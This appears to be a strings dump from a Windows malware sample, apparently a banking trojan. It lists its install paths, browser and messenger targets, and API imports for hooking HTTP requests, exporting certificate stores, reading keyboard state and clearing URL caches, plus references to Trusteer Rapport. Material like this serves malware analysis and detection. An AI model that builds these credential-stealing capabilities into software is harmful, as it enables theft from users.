Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpAddRequestHeadersA
HttpOpenRequestA
wlcomm.exe
msmsgs.exe
msnmsgr.exe
PR_OpenTCPSocket
kernel32.dll
Crypt32.dll
Advapi32.dll
ws2_32.dll
wininet.dll
Ht.Ht!HHt
w SSh
SSSSh
t.VPW
%System%\WININET.dll
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\USER32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
trivax1.Bin.exe
config.bin
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
trivax1.Bin
Microsoft Windows
%System%\ADVAPI32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
CertCloseStore
CertAddCertificateContextToStore
CertOpenStore
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertNameToStrA
CertEnumCertificatesInStore
CertOpenSystemStoreA
CRYPT32.dll
ntdll.dll
WS2_32.dll
FindCloseUrlCache
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
WININET.dll
SHLWAPI.dll
GetProcessHeap
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
WaitNamedPipeA
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
EnumWindows
GetKeyState
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptGetKeyParam
CryptGetUserKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
3-33383|3
6"6(6-676
RapportUtil.
(GMT %su:u) %s
\prefs.js
RapportTanzan36.
RapportKoan.